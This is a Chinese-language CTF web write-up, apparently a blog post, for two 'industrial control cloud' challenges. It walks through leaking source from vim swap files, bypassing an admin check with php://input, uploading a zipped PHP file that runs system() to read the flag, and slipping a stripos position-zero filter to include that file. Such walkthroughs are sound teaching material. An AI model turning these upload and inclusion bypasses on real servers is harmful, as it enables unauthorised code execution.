赛博地球杯(不会部分

web篇

工控云管理系统客服中心期待您的反馈

工控云管理系统客服中心存在漏洞,flag就在flag/flag/flag/flag/flag/flag/flag.php文件里面 http://47.104.188.226:20001 请找到这个隐藏的文件,swp?不不不。。。再找找。。

源码泄漏,以后拿到题目没思路先把可能泄漏源码的地方试一遍再说

1
2
3
http://47.104.188.226:20001/.index.php.swp
http://47.104.188.226:20001/.index.php.swo
http://47.104.188.226:20001/.index.php.swn

这里就是源码泄漏,然后拿到index的源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
<?php
error_reporting(0);
ini_set('open_basedir', '/var/www/html');
function autoload($page) {
    if (stripos($_SERVER['QUERY_STRING'], 'flag') > 0) {
      die('no flag flag flag flag !');
    }
    if (stripos($_SERVER['QUERY_STRING'], 'uploaded') > 0) {
      die('no uploaded uploaded uploaded uploaded !');
    }
    if (stripos($_SERVER['QUERY_STRING'], '://f') > 0) {
      die('no ://f ://f ://f');
    }
    if (stripos($_SERVER['QUERY_STRING'], 'ata') > 0) {
      die('no ata ata ata');
    }
    if (stripos($_SERVER['QUERY_STRING'], '0') > 0) {
      die('no 0 0 0');
    }
    if(file_exists("./includes/$page.php")) {
        include "./includes/$page.php";
    }
    elseif(file_exists("./includes/$page")) {
        include "./includes/$page";
    }else{
      echo "File is not exit ";
    }
}
function download($adfile, $file){
  //Only Administrators can download files .
      $cert = 'N';
    if(isset($adfile) && file_get_contents($adfile, 'r') === 'Yeah Everything Will Be Ok My Boss') {
      echo "Welcome ! You Are Administrator !";
      $cert = 'Y';
    }else{
      echo "error1";
    }
    if ($cert === 'Y'){
      if (stripos($file, 'file_list') != false) die('error4');
      if (stripos($file, 'file_list') >= 0) {
      header('Content-Description: File Transfer');
      header('Content-Type: application/octet-stream');
      header('Content-Disposition: attachment; filename='. basename($file));
      header('Content-Transfer-Encoding: binary');
      header('Expires: 0');
      header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
      header('Pragma: public');
      header('Content-Length: ' . filesize($file));
      readfile($file);
    }else{
      die('error2');
    }
}else{
  echo 'error3';
}
}
if(!isset($_GET['page'])) {
    $page = 'index';
}
else {
    $page = $_GET['page'];
}
if (stripos($page, './') > 0) {
  die('no ./ ./ ./ ./');
}
if (stripos($page, '://') > 0) {
  die('no :// :// ://');
}
autoload($page);
if (isset($_GET[admin]) && isset($_GET[file])) {
  if (stripos($_GET[admin], 'flag') > 0  stripos($_GET[file], 'flag') > 0) {
    die('not flag flag flag falg !');
  }
  if (strlen($_GET[file]) >= 38) {
    die('too long');
  }
  download($_GET[admin], $_GET[file]);
}
?>

里面有一个文件下载的函数,只有通过了认证才可以下载,然后认证的部分是

1
2
3
4
if(isset($adfile) && file_get_contents($adfile, 'r') === 'Yeah Everything Will Be Ok My Boss') {
      echo "Welcome ! You Are Administrator !";
      $cert = 'Y';
    }

这里绕过直接用php://input就可以了,然后通过file参数来下载upload.php 顺利拿到upload.php的源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
<?php
    if (stripos($_SERVER['QUERY_STRING'], 'flag') > 0) {
      die('no flag flag flag flag !');
    }
    if (!empty($_FILES)) {
    //properties of the uploaded file
    $name= $_FILES["filename"]["name"];
    $type= $_FILES["filename"]["type"];
    $size= $_FILES["filename"]["size"];
    $temp= $_FILES["filename"]["tmp_name"];
    $error= $_FILES["filename"]["error"];
    if (strlen($name) >= 6) {
      die('name is too long !');
    }
    if (stripos($name, './') > 0) {
      die('invalid parameter');
    }
    if (stripos($name, 'php') > 0) {
      die('invalid parameter');
    }
    if (substr($name, -3, 3) !== 'zip' && substr($name, -3, 3) !== 'jpg' && substr($name, -3, 3) !== 'png') {
      die('file can not upload ! ');
    }
    if ($error > 0)
        die("Error uploading file! code $error.");
    else
       {
        if($type !== "application/zip"  $size > 400)//condition for the file
        {
        die("Format not allowed or file size too big!");
        }
        else
        {
          if(file_exists('includes')){
            move_uploaded_file($temp, "includes/uploaded/" .$name);
            echo "Upload complete a!";
            shell_exec('sh /var/www/html/includes/unzip.sh');
          }elseif(file_exists('uploaded')){
            move_uploaded_file($temp, "uploaded/" .$name);
            echo "Upload complete!";
            shell_exec('sh /var/www/html/includes/unzip.sh');
          }
         }
    }
  }else{
    if(isset($_GET['step']) && strlen($_GET['step']) === 20) {
      if (stripos($_GET['step'], 'lag') > 0) {
        die('error');
      }
      if (stripos($_GET['step'], './') > 0) {
        die('error');
      }
      if (stripos($_GET['step'], ' ') > 0) {
        die('error');
      }
      if (stripos($_GET['step'], '/') > 0) {
        die('error');
      }
      if (preg_match('/[^\w\d_ -]/si', $_GET['step'])) {
        $_GET['step'] = preg_replace('/[^a-zA-Z0-9_ -]/s', '', $_GET['step']);
        die('error');
      }
        passthru('cat ' . 'uploaded/' . $_GET['step']);
    }else{
      die();
    }
  }
?>

看一下源码,balabala一大堆,发现就是可以上传一个zip文件嘛,然后名字不能太长,传上去之后会调用一个unzip.sh,访问一下http://47.104.188.226:20001/includes/unzip.sh 拿到了unzip.sh的源码

1
2
3
4
5
6
7
8
9
10
11
12
#/bin/bash
cd ./uploaded
find ./ -size +1M  xargs rm
cd ../
unzip -o ./uploaded/*.zip -d ./uploaded/
rm -rf ./uploaded/*.zip
rm -rf ./uploaded/*.*
rm -rf ./uploaded/.*
cd ./uploaded
find -type d  xargs rm -rf
touch /var/www/html/includes/uploaded/index.php
chmod 000 /var/www/html/includes/uploaded/index.php

这个脚本会删除带.的文件而且会删除目录文件,最后创建一个index.php,但不给权限 那我们创建一个123,里面写一个

1
2
3
<?php
system('cat flag/flag/flag/flag/flag/flag/flag.php');
?>

压缩成1.zip,上传,抓包改type为application/zip,然后上传和解压成功,之后就是包含这个文件拿flag了,index里面有包含的部分,但是那里对upload进行了检测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
function autoload($page) {
    if (stripos($_SERVER['QUERY_STRING'], 'flag') > 0) {
      die('no flag flag flag flag !');
    }
    if (stripos($_SERVER['QUERY_STRING'], 'uploaded') > 0) {
      die('no uploaded uploaded uploaded uploaded !');
    }
    if (stripos($_SERVER['QUERY_STRING'], '://f') > 0) {
      die('no ://f ://f ://f');
    }
    if (stripos($_SERVER['QUERY_STRING'], 'ata') > 0) {
      die('no ata ata ata');
    }
    if (stripos($_SERVER['QUERY_STRING'], '0') > 0) {
      die('no 0 0 0');
    }
    if(file_exists("./includes/$page.php")) {
        include "./includes/$page.php";
    }
    elseif(file_exists("./includes/$page")) {
        include "./includes/$page";
    }else{
      echo "File is not exit ";
    }
}

这里用的是stripos,这个函数返回的是字符串第一次被匹配到的位置,但注意,字符串是从0开始记的,所以我们构造一个http://47.104.188.226:20001/index.php?uploaded&page=uploaded/123 那么就可以绕过了,包含之后拿到flag 因为没有环境,都是参考的别人的wp,主要是理解一下吧.... dalao博客看这里

请关注工控云管理系统的警告记录

参与工控云管理系统警告记录的活动,可能奖励你一个flag
http://47.104.166.183:20008

题目给出源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<?php
   if(!isset($_GET['c']) && !isset($_GET['re'])) {
       show_source(__FILE__);
   }
   $selfdir = $_GET['dir'];
   if (!isset($selfdir)) {
     die();
   }
   $secret = '/var/www/html/hackme/' . md5("cetcrce" . $selfdir . $_SERVER['REMOTE_ADDR']);
   @chdir('hackme');
   @mkdir($secret);
   @chdir($secret);
   if (isset($_GET['c']) && strlen($_GET['c']) <= 5) {
       include('waf.php');
       @exec($_GET['c']);
   }elseif(isset($_GET['re'])) {
       @exec('/bin/rm -rf ' . $secret);
       @exec('touch /var/www/html/hackme/index.php');
   }
?>

这道题是hitcon17的babyfirst的一道改编题,多出来一个waf,具体内容未知,然后curl被ban掉了,直接写一个shell上去,多次写,具体方案我后续会写一篇hitcon17的babyfirst,里面差不多就有答案 ....... 关于waf的问题..由于没有环境测试..暂时留一份大佬的wp,以后参考吧...这里就不放出了